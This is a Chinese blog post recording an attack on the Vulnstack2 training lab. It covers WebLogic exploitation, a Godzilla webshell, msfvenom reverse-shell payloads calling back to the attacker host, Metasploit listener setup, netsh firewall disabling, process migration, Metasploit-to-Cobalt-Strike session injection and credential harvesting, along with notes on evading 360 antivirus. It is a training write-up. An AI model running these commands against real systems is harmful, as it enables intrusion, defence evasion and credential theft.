首页 > 其他分享 >vulnstack2靶场记录

vulnstack2靶场记录

时间:2023-10-24 20:56:41浏览次数:40  
标签:set 记录 vulnstack2 哥斯拉 192.168 提权 进程 msf 靶场

内网渗透:Vulnstack2靶场记录

环境配置

  • web机恢复快照至v1.3

  • 在VMWare上开一张新的虚拟网卡,网段为10.10.10.0/24

  • 检测连通性:在192.168.208.0/24网段下,Kali一开始死活ping不通web和PC,解决方案:

    • 允许防火墙进行ICMP回显
      • netsh firewall set icmpsetting 8:允许被ping
    • 关闭手动配置IP,让DHCP自动分配
  • 在检测完连通性后,再一次开启防火墙禁ping策略

    • netsh firewall set icmpsetting 8 disable
  • IP配置:

主机 IP地址 所在功能区
web 内网:10.10.10.80 外网:192.168.208.163 DMZ
PC 内网:10.10.10.201 外网:192.168.208.162
DC 域控、DNS服务器 10.10.10.10 核心区
Kali 攻击机 192.168.208.161 外网
  • 网络拓扑:

    图片来自红日靶场官网

img

外网信息收集

nmap 192.168.208.0/24

image-20231006163003185

162、163这两台机器上都有不少开放端口

在163机器上开放了:

445:Microsoft-DS是微软的补丁,是445端口的,可以拒绝服务攻击漏洞。

3389:3389端口是Windows 2000(2003) Server远程桌面的服务端口

7001:Oracle Weblogic Server的默认端口

  • 这很明显就是要打weblogic,拿weblogicscanner进行一波漏洞扫描

image-20231007150842990

  • 拿CVE打,工具直接一梭哈

image-20231007150940435

  • 紧接着传马,关于weblogic的上传木马问题是有讲究的,具体查看如下:https://www.adminxe.com/2604.html

    tree /f .查看当前目录及其子目录的所有文件,找到一个合适的文件上传点

    jsp木马的生成可以利用哥斯拉的生成模块

    image-20231007151320808

  • 哥斯拉连接webshell,直接de1ay\administrator,这预示着web机拿下了

image-20231007150721201

  • 想用msf做个反弹shell,没成功?估计有杀软

image-20231014140807784

查看主机当前运行的进程:

wmic process list brief

将结果扔入Chatgpt分析,确实有杀软ZhuDongFangYu.exe,为360的主动防御杀软

(也可以使用https://saucer-man.com/avlist/index.html查找杀软进程,如下图)

image-20231022195505344

关闭防火墙

Windows server 2003及之前版本:
netsh firewall set opmode disable    #关闭  
netsh firewall set opmode enable     #开启
Windows server 2003之后版本:
netsh advfirewall set allprofiles state off    #关闭    
netsh advfirewall set allprofiles state on     #开启

哥斯拉协助MSF上线 & 哥斯拉一键式提权

  • 使用msfveom生成可执行程序
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.208.161 lport=6677 -f exe -o msfshell.exe

使用哥斯拉上传文件该msfshell.exe

  • 部署msf监听
use exploit/multi/handler
# 使用payload类型  windows的反弹shell
set payload windows/meterpreter/reverse_tcp
# 选择接收地址
set lhost 192.168.208.161
# 选择监听端口
set lport 6677
# 运行
run
  • 使用哥斯拉上线MSF

image-20231022212125198

image-20231022212153580

getsystem但是还是没办法提权。。。麻了啊

image-20231022225212115

  • 后来发现哥斯拉能够一键式帮忙提权:

image-20231023134505988

至此外网机拿下

MSF进程迁移提权

正常使用exe上线msf时,会在任务管理器或者tasklist命令中看到我们的木马进程。

进程迁移大致原理是通过将木马进程绑定到系统已有进程上(且最好是高权限进程),达到寄生的目的。

image-20231024104221841

手动迁移

msf中查看当前所有进程:ps

查看当前进程:getpid

然后进程迁移:

# 指定进程名进行迁移
migrate -N ProcessName
# 指定进程号进行迁移
migrate PID

可以发现进程迁移后为:

image-20231024104626254

自动迁移

# 迁移到指定进程
set autorunscript migrate -n ProcessName

# 自动迁移到进程
set AytoRunScript migrate -f

# 上线msf, 并且运行后台
exploit -j -z

MSF派生CS上线

这里的情景是我已经通过msf进行提权,但是想cs上线,用cs上线那一套都不好使。

解决方案:使用msf提权获取的session,派生到cs上。

这里的坑点是msf中的payload类型应该和cs中监听器的类型匹配。

具体可以参考:https://maidang.cool/2021/9930.html

  • 保存session:

image-20231024180455295

  • 设置监听器

image-20231024180944882

  • msf的session派生到cs上
use exploit/windows/local/payload_inject
# 注意和监听器要匹配
set payload windows/meterpreter/reverse_http
# 设置CS listenner的ip和port
set lhost 192.168.208.161
set lport 8011
# 设置msf不接收session
set disablepayloadhandler true
set session
run

可以观察到CS上线

image-20231024180655632

内网渗透

票据提取

直接CS一把梭了,点击某台机器右键,可以进行很多信息收集

image-20231024190628277

可以在View中的Credentials中查看到汇总票据

image-20231024190659777

横向移动

查看域成员:shell net user /domain

6,估计是不知道重装的时候环境搞崩了还是,无所谓,我选择摆烂下班

image-20231024202025811

  • 反正大致思路,就是CS一把梭,跳板机层层跳就行,

image-20231024191251804

​ 选对session就行

image-20231024191308758

环境,懒得搞了。

思考

我在打靶场的时候,绕杀软绕了很久,这里描述一下我的思路历程:

  1. 手动删杀软,动静太大,而且能否杀干净是一回事。
  2. 360有手就行?可是我还不会免杀,网上找的几个免杀都很鸡肋
  3. 哥斯拉一键提权,挺好,但是操作很鸡肋。
  4. 最后成功的思路:首先在低权限下关闭防火墙,进程迁移提权,msf上线,msf派生cs上线,最后在cs上打后渗透工作(虽然最后因为环境问题连域都连接不上...

参考

  1. 免杀思路:https://lf2022.cn/2022/12/8501/

  2. 利用环境变量过免杀:https://hacked.cool/archives/342/

  3. https://blog.csdn.net/weixin_47533648/article/details/121356829

标签:set,记录,vulnstack2,哥斯拉,192.168,提权,进程,msf,靶场
From: https://www.cnblogs.com/icfh/p/17785719.html

相关文章

  • 刷题记录-移除元素
    刷题记录-移除元素移除元素给你一个数组nums和一个值val,你需要原地移除所有数值等于val的元素,并返回移除后数组的新长度。不要使用额外的数组空间,你必须仅使用O(1)额外空间并原地修改输入数组。元素的顺序可以改变。你不需要考虑数组中超出新长度后面的元素。示例......
  • 【Python】【ChatGPT】本地部署ChatGPT学习记录
    学习一下GPT项目的相关使用和部署 一、GPT4ALL模型Github:https://github.com/nomic-ai/gpt4allGPT4ALL项目部署简易,但是在运行体验上一般,并且是只调用CPU来进行运算,看官方文档介绍在嵌入式上有比较大的优势,但是目前个人对嵌入式方向接触不深,仅在本机部署使用。本机配置(CPU:i5......
  • 记录--vue3实现excel文件预览和打印
    这里给大家分享我在网上总结出来的一些知识,希望对大家有所帮助前言在前端开发中,有时候一些业务场景中,我们有需求要去实现excel的预览和打印功能,本文在vue3中如何实现Excel文件的预览和打印。预览excel关于实现excel文档在线预览的做法,一种方式是通过讲文档里的数据处理成......
  • thinkphp5 使用group查询最新的一条记录
    thinkphp5示例://子查询主要的在MAX(create_time)$subQuery=Db::table('fa_crm_record')->field('customer_id,MAX(create_time)AScreate_time')->group('customer_id')......
  • FOFA语法记录
    inurl:.php?intext:CHARACTER_SETS,COLLATIONS,?intitle:phpmyadmin1、domain=“51.com”//搜索51.com所有的子域名2、host=51.cn”//从url中搜索51.cn3、ip=“1.1.1.1”//搜索ip4、server=“apache”//搜索服务是apache的网站5、os=“windows”//搜素操作系统是windows的......
  • burpsuite靶场
    xx'--sql语句中可能有andreleased=1,因为数据库把有的数据隐藏了xx'+or+1=1--查询所有username='xx'--'andpassword=''颠覆逻辑'unionselectxxx--检索数据库中数据SELECT*FROMv$version检索数据库信息ctrl+u:url编码SQLinjectionattack,queryingth......
  • 【记录2】华为云耀云服务器L实例_mysql部署CentOS 7
    产品官网:https://www.huaweicloud.com/product/hecs-light.html1.本地终端远程登录华为云耀云服务器L实例购买华为云耀云服务器L实例后,我采用的是Putty作为本地终端,在华为云耀云服务器L实例上进行mysql的安装和配置、后续的应用部署提供数据库服务。输入IP地址点击Open后......
  • 【记录4】华为云耀云服务器L实例-本地Navicate连接数据库 CentOS 7
     书接上回,在完成了mysql部署和云服务器的安全组配置后,需要用本地的数据库管理工具Navicate远程连接华为云耀云服务器L实例上的数据库 1.打开已下载安装的Navicate软件(下载安装过程不在此赘述),左上角新建链接,这里CentOS7使用的是MariaDB数据库服务,故我们选择创建MariaDB数据库......
  • 【记录1】华为云-购买与使用软件管理 CentOS 7
     【记录一】华为云耀云服务器L实例-购买与使用软件管理 CentOS 7今天我们采用华为云耀云服务器L实例为例,介绍开始选配服务器到修改相关配置信息,到使用服务器管理软件进行服务管理,并上传文件到服务器中。https://www.huaweicloud.com/product/hecs-light.html1. 首先进......
  • 日常有用的代码记录
    快读inlineintread(){intx=0,f=1;charch=getchar();while(ch<'0'||ch>'9'){if(ch=='-')f=-1;ch=getchar();}while(ch>='0'&&ch<='9&......